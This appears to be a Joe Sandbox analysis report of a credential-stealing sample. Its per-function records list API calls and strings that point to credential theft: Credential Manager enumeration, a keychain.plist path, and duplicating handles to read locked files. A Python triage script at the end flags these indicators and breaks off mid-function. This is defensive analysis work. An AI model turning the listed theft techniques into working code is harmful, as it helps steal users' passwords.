40207->40231 40209 42ff9d 40209->40197 40210 42ff99 40210->40209 40211 42ffe3 40210->40211 40212 42ffd0 40210->40212 40236 4169a7 11 API calls 40211->40236 40235 4169a7 11 API calls 40212->40235 40216 415a9d 40215->40216 40217 415ab3 40216->40217 40218 415aa4 memset 40216->40218 40217->40197 40218->40217 40385 4165a0 40219->40385 40222->40197 40223->40197 40224->40197 40225->40197 40226->40200 40227->40200 40228->40200 40229->40188 40230->40196 40232 438187 40231->40232 40234 438192 40231->40234 40237 4380f6 40232->40237 40234->40210 40235->40209 40236->40209 40239 43811f 40237->40239 40238 438164 40238->40234 40239->40238 40242 437e5e 40239->40242 40265 4300e8 memset memset memcpy 40239->40265 40266 437d3c 
40242->40266 40244 437eb3 40244->40239 40245 437ea9 40245->40244 40250 437f22 40245->40250 40281 41f432 40245->40281 40248 437f06 40328 415c56 11 API calls 40248->40328 40252 437f7f 40250->40252 40253 432d4e 3 API calls 40250->40253 40251 437f95 40329 415c56 11 API calls 40251->40329 40252->40251 40254 43802b 40252->40254 40253->40252 40256 4165ff 11 API calls 40254->40256 40257 438054 40256->40257 40292 437371 40257->40292 40260 43806b 40261 438094 40260->40261 40330 42f50e 138 API calls 40260->40330 40264 437fa3 40261->40264 40331 4300e8 memset memset memcpy 40261->40331 40264->40244 40332 41f638 104 API calls 40264->40332 40265->40239 40267 437d69 40266->40267 40270 437d80 40266->40270 40333 437ccb 11 API calls 40267->40333 40269 437d76 40269->40245 40270->40269 40271 437da3 40270->40271 40272 437d90 40270->40272 40274 438460 134 API calls 40271->40274 40272->40269 40337 437ccb 11 API calls 40272->40337 40277 437dcb 40274->40277 40275 437de8 40336 424f26 123 API calls 40275->40336 40277->40275 40334 444283 13 API calls 40277->40334 40279 437dfc 40335 437ccb 11 API calls 40279->40335 40282 41f54d 40281->40282 40288 41f44f 40281->40288 40283 41f466 40282->40283 40367 41c635 memset memset 40282->40367 40283->40248 40283->40250 40288->40283 40290 41f50b 40288->40290 40338 41f1a5 40288->40338 40363 41c06f memcmp 40288->40363 40364 41f3b1 90 API calls 40288->40364 40365 41f398 86 API calls 40288->40365 40290->40282 40290->40283 40366 41c295 86 API calls 40290->40366 40368 41703f 40292->40368 40294 437399 40295 43739d 40294->40295 40297 4373ac 40294->40297 40375 4446ea 11 API calls 40295->40375 40298 416935 16 API calls 40297->40298 40299 4373ca 40298->40299 40300 438460 134 API calls 40299->40300 40305 4251c4 137 API calls 40299->40305 40309 415a91 memset 40299->40309 40312 43758f 40299->40312 40324 437584 40299->40324 40327 437d3c 135 API calls 40299->40327 40376 425433 13 API calls 40299->40376 40377 425413 17 API calls 40299->40377 40378 42533e 16 API calls 
40299->40378 40379 42538f 16 API calls 40299->40379 40380 42453e 123 API calls 40299->40380 40300->40299 40301 4375bc 40303 415c7d 16 API calls 40301->40303 40304 4375d2 40303->40304 40306 4442e6 11 API calls 40304->40306 40326 4373a7 40304->40326 40305->40299 40307 4375e2 40306->40307 40307->40326 40383 444283 13 API calls 40307->40383 40309->40299 40381 42453e 123 API calls 40312->40381 40315 4375f4 40318 437620 40315->40318 40319 43760b 40315->40319 40317 43759f 40320 416935 16 API calls 40317->40320 40322 416935 16 API calls 40318->40322 40384 444283 13 API calls 40319->40384 40320->40324 40322->40326 40324->40301 40382 42453e 123 API calls 40324->40382 40325 437612 memcpy 40325->40326 40326->40260 40327->40299 40328->40244 40329->40264 40330->40261 40331->40264 40332->40244 40333->40269 40334->40279 40335->40275 40336->40269 40337->40269 40339 41bc3b 101 API calls 40338->40339 40340 41f1b4 40339->40340 40341 41edad 86 API calls 40340->40341 40348 41f282 40340->40348 40342 41f1cb 40341->40342 40343 41f1f5 memcmp 40342->40343 40344 41f20e 40342->40344 40342->40348 40343->40344 40345 41f21b memcmp 40344->40345 40344->40348 40346 41f326 40345->40346 40349 41f23d 40345->40349 40347 41ee6b 86 API calls 40346->40347 40346->40348 40347->40348 40348->40288 40349->40346 40350 41f28e memcmp 40349->40350 40352 41c8df 56 API calls 40349->40352 40350->40346 40351 41f2a9 40350->40351 40351->40346 40354 41f308 40351->40354 40355 41f2d8 40351->40355 40353 41f269 40352->40353 40353->40346 40356 41f287 40353->40356 40357 41f27a 40353->40357 40354->40346 40361 4446ce 11 API calls 40354->40361 40358 41ee6b 86 API calls 40355->40358 40356->40350 40359 41ee6b 86 API calls 40357->40359 40360 41f2e0 40358->40360 40359->40348 40362 41b1ca memset 40360->40362 40361->40346 40362->40348 40363->40288 40364->40288 40365->40288 40366->40282 40367->40283 40369 417044 40368->40369 40370 41705c 40368->40370 40372 416760 11 API calls 40369->40372 40374 417055 40369->40374 40371 417075 
40370->40371 40373 41707a 11 API calls 40370->40373 40371->40294 40372->40374 40373->40369 40374->40294 40375->40326 40376->40299 40377->40299 40378->40299 40379->40299 40380->40299 40381->40317 40382->40301 40383->40315 40384->40325 40390 415cfe 40385->40390 40395 415d23 __aullrem __aulldvrm 40390->40395 40397 41628e 40390->40397 40391 4163ca 40404 416422 11 API calls 40391->40404 40393 416422 10 API calls 40393->40395 40394 416172 memset 40394->40395 40395->40391 40395->40393 40395->40394 40396 415cb9 10 API calls 40395->40396 40395->40397 40396->40395 40398 416520 40397->40398 40399 416527 40398->40399 40403 416574 40398->40403 40401 416544 40399->40401 40399->40403 40405 4156aa 11 API calls 40399->40405 40402 416561 memcpy 40401->40402 40401->40403 40402->40403 40403->40197 40404->40397 40405->40401 40437 41493c EnumResourceNamesW 37678 4287c1 37679 4287d2 37678->37679 37680 429ac1 37678->37680 37681 428818 37679->37681 37682 42881f 37679->37682 37688 425711 37679->37688 37693 425ad6 37680->37693 37748 415c56 11 API calls 37680->37748 37715 42013a 37681->37715 37743 420244 97 API calls 37682->37743 37687 4260dd 37742 424251 120 API calls 37687->37742 37688->37680 37690 4259da 37688->37690 37696 422aeb memset memcpy memcpy 37688->37696 37697 429a4d 37688->37697 37700 4260a1 37688->37700 37711 4259c2 37688->37711 37714 425a38 37688->37714 37731 4227f0 memset memcpy 37688->37731 37732 422b84 15 API calls 37688->37732 37733 422b5d memset memcpy memcpy 37688->37733 37734 422640 13 API calls 37688->37734 37736 4241fc 11 API calls 37688->37736 37737 42413a 90 API calls 37688->37737 37741 416760 11 API calls 37690->37741 37696->37688 37698 429a66 37697->37698 37702 429a9b 37697->37702 37744 415c56 11 API calls 37698->37744 37740 415c56 11 API calls 37700->37740 37703 429a96 37702->37703 37746 416760 11 API calls 37702->37746 37747 424251 120 API calls 37703->37747 37706 429a7a 37745 416760 11 API calls 37706->37745 37711->37693 37735 415c56 11 API calls 37711->37735 
37714->37711 37738 422640 13 API calls 37714->37738 37739 4226e0 12 API calls 37714->37739 37716 42014c 37715->37716 37719 420151 37715->37719 37758 41e466 97 API calls 37716->37758 37718 420162 37718->37688 37719->37718 37720 4201b3 37719->37720 37721 420229 37719->37721 37722 4201b8 37720->37722 37723 4201dc 37720->37723 37721->37718 37724 41fd5e 86 API calls 37721->37724 37749 41fbdb 37722->37749 37723->37718 37727 4201ff 37723->37727 37755 41fc4c 37723->37755 37724->37718 37727->37718 37730 42013a 97 API calls 37727->37730 37730->37718 37731->37688 37732->37688 37733->37688 37734->37688 37735->37690 37736->37688 37737->37688 37738->37714 37739->37714 37740->37690 37741->37687 37742->37693 37743->37688 37744->37706 37745->37703 37746->37703 37747->37680 37748->37690 37750 41fbf1 37749->37750 37751 41fbf8 37749->37751 37754 41fc39 37750->37754 37773 4446ce 11 API calls 37750->37773 37763 41ee26 37751->37763 37754->37718 37759 41fd5e 37754->37759 37756 41ee6b 86 API calls 37755->37756 37757 41fc5d 37756->37757 37757->37723 37758->37719 37761 41fd65 37759->37761 37760 41fdab 37760->37718 37761->37760 37762 41fbdb 86 API calls 37761->37762 37762->37761 37764 41ee41 37763->37764 37765 41ee32 37763->37765 37774 41edad 37764->37774 37777 4446ce 11 API calls 37765->37777 37768 41ee3c 37768->37750 37771 41ee58 37771->37768 37779 41ee6b 37771->37779 37773->37754 37783 41be52 37774->37783 37777->37768 37778 41eb85 11 API calls 37778->37771 37780 41ee70 37779->37780 37781 41ee78 37779->37781 37839 41bf99 86 API calls 37780->37839 37781->37768 37784 41be6f 37783->37784 37785 41be5f 37783->37785 37791 41be8c 37784->37791 37804 418c63 37784->37804 37818 4446ce 11 API calls 37785->37818 37788 41be69 37788->37768 37788->37778 37789 41bee7 37789->37788 37822 41a453 86 API calls 37789->37822 37791->37788 37791->37789 37792 41bf3a 37791->37792 37795 41bed1 37791->37795 37821 4446ce 11 API calls 37792->37821 37794 41bef0 37794->37789 37797 41bf01 37794->37797 37795->37794 37798 
41bee2 37795->37798 37796 41bf24 memset 37796->37788 37797->37796 37799 41bf14 37797->37799 37819 418a6d memset memcpy memset 37797->37819 37808 41ac13 37798->37808 37820 41a223 memset memcpy memset 37799->37820 37803 41bf20 37803->37796 37807 418c72 37804->37807 37805 418c94 37805->37791 37806 418d51 memset memset 37806->37805 37807->37805 37807->37806 37809 41ac52 37808->37809 37810 41ac3f memset 37808->37810 37813 41ac6a 37809->37813 37823 41dc14 19 API calls 37809->37823 37811 41acd9 37810->37811 37811->37789 37815 41aca1 37813->37815 37824 41519d 37813->37824 37815->37811 37816 41acc0 memset 37815->37816 37817 41accd memcpy 37815->37817 37816->37811 37817->37811 37818->37788 37819->37799 37820->37803 37821->37789 37823->37813 37827 4175ed 37824->37827 37835 417570 SetFilePointer 37827->37835 37830 41760a ReadFile 37831 417637 37830->37831 37832 417627 GetLastError 37830->37832 37833 4151b3 37831->37833 37834 41763e memset 37831->37834 37832->37833 37833->37815 37834->37833 37836 4175b2 37835->37836 37837 41759c GetLastError 37835->37837 37836->37830 37836->37833 37837->37836 37838 4175a8 GetLastError 37837->37838 37838->37836 37839->37781 37840 417bc5 37842 417c61 37840->37842 37846 417bda 37840->37846 37841 417bf6 UnmapViewOfFile CloseHandle 37841->37841 37841->37846 37844 417c2c 37844->37846 37852 41851e 20 API calls 37844->37852 37846->37841 37846->37842 37846->37844 37847 4175b7 37846->37847 37848 4175d6 FindCloseChangeNotification 37847->37848 37849 4175c8 37848->37849 37850 4175df 37848->37850 37849->37850 37851 4175ce Sleep 37849->37851 37850->37846 37851->37848 37852->37844 39886 4147f3 39889 414561 39886->39889 39888 414813 39890 41456d 39889->39890 39891 41457f GetPrivateProfileIntW 39889->39891 39894 4143f1 memset _itow WritePrivateProfileStringW 39890->39894 39891->39888 39893 41457a 39893->39888 39894->39893

                  Control-flow Graph

                  [Control-flow graph for the function at 40dd85 (basic blocks 40dd85 through 40e01b), with executed and not-executed blocks marked]
                  APIs
                  • memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                  • _wcsicmp.MSVCRT ref: 0040DEB2
                  • _wcsicmp.MSVCRT ref: 0040DEC5
                  • _wcsicmp.MSVCRT ref: 0040DED8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                  • memset.MSVCRT ref: 0040DF5F
                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                  • _wcsicmp.MSVCRT ref: 0040DFB2
                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                  • API String ID: 594330280-3398334509
                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                  Control-flow Graph

                  [Control-flow graph for the function at 413d4c (basic blocks 413d4c through 413f24), with executed and not-executed blocks marked]
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                  • memset.MSVCRT ref: 00413D7F
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                  • memset.MSVCRT ref: 00413E07
                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                  • API String ID: 2191996607-1740548384
                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                  • memcpy.MSVCRT ref: 0040B60D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                  • String ID: BIN
                  • API String ID: 1668488027-1015027815
                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                  APIs
                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                  • String ID:
                  • API String ID: 2947809556-0
                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID:
                  • API String ID: 1690352074-0
                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                  APIs
                  • memset.MSVCRT ref: 0041898C
                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InfoSystemmemset
                  • String ID:
                  • API String ID: 3558857096-0
                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                  Control-flow Graph

                  [Control-flow graph for the function at 44553b (basic blocks 44553b through 445fb2), with executed and not-executed blocks marked]
                  APIs
                  • memset.MSVCRT ref: 004455C2
                  • wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 0044570D
                  • memset.MSVCRT ref: 00445725
                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  • memset.MSVCRT ref: 0044573D
                  • memset.MSVCRT ref: 00445755
                  • memset.MSVCRT ref: 004458CB
                  • memset.MSVCRT ref: 004458E3
                  • memset.MSVCRT ref: 0044596E
                  • memset.MSVCRT ref: 00445A10
                  • memset.MSVCRT ref: 00445A28
                  • memset.MSVCRT ref: 00445AC6
                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  • memset.MSVCRT ref: 00445B52
                  • memset.MSVCRT ref: 00445B6A
                  • memset.MSVCRT ref: 00445C9B
                  • memset.MSVCRT ref: 00445CB3
                  • _wcsicmp.MSVCRT ref: 00445D56
                  • memset.MSVCRT ref: 00445B82
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                  • memset.MSVCRT ref: 00445986
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                  • API String ID: 2745753283-3798722523
                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
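The per-function records on this page list only what Joe Sandbox's IDA plugin recovered: API calls (direct or via subcall) and referenced strings. The credential-theft verdicts in the signature list come from reading those indicators against each other: CredEnumerateW beside an Apple keychain.plist path, NtQuerySystemInformation with class 0x10 (SystemHandleInformation) beside OpenProcess(0x40 = PROCESS_DUP_HANDLE) and DuplicateHandle, or FindFirstUrlCacheEntryW with the visited: prefix. The Python script below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses records in this report's own text layout and flags those patterns. SAMPLE_REPORT is an abbreviated excerpt of four records from this page (argument lists shortened); the indicator table and its wording are this example's own choices, not the sandbox's scoring.

```python
import re
from dataclasses import dataclass, field

# Sample input: abbreviated excerpt of four function records from this report,
# in the report's own "APIs / Strings / Opcode ID" layout (argument lists shortened).
SAMPLE_REPORT = r"""
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Strings
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
APIs
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000), ref: 0040DE15
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104), ref: 0040E093
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
Strings
• String ID: bhv
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
APIs
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
• String ID: visited:
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
APIs
Strings
• String ID:
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
"""

# One "• Name.MODULE(args), ref: ADDR" line, optionally nested as "Part of subcall function".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    via_subcall: bool

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)

@dataclass
class Finding:
    function: str   # first 8 hex digits of the record's Opcode ID
    hits: list

def parse_records(text):
    """Split report text into per-function records; a record starts at an 'APIs' line."""
    records, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["sub"] is not None))
        elif stripped.startswith("• String ID:"):
            # The plugin joins referenced strings with '$'.
            cur.strings = [s for s in stripped[len("• String ID:"):].strip().split("$") if s]
        elif stripped.startswith("• Opcode ID:"):
            cur.opcode_id = stripped.split(":", 1)[1].strip()
    return records

# Substrings that mark credential stores or saved-login URLs (this example's own table).
STRING_MARKERS = ("keychain.plist", "visited:", "login.yahoo.com", "google.com/accounts", "facebook.com")

def credential_indicators(rec):
    hits = []
    names = {a.name for a in rec.apis}
    if "CredEnumerateW" in names:
        hits.append("CredEnumerateW: enumerates Credential Manager (vault) entries")
    if "FindFirstUrlCacheEntryW" in names:
        hits.append("FindFirstUrlCacheEntryW: walks the WinINet cache/history index")
    # Class 0x10 is SystemHandleInformation; paired with DuplicateHandle it is the
    # classic way to read a file that another process holds open with a lock.
    handle_enum = any(a.name == "NtQuerySystemInformation" and a.args.startswith("00000010")
                      for a in rec.apis)
    if handle_enum and "DuplicateHandle" in names:
        hits.append("SystemHandleInformation + DuplicateHandle: copies a file locked by another process")
    for s in rec.strings:
        if any(marker in s.lower() for marker in STRING_MARKERS):
            hits.append(f"string: {s}")
    return hits

def triage(report_text):
    """Return only the records that carry at least one credential-access indicator."""
    findings = []
    for rec in parse_records(report_text):
        hits = credential_indicators(rec)
        if hits:
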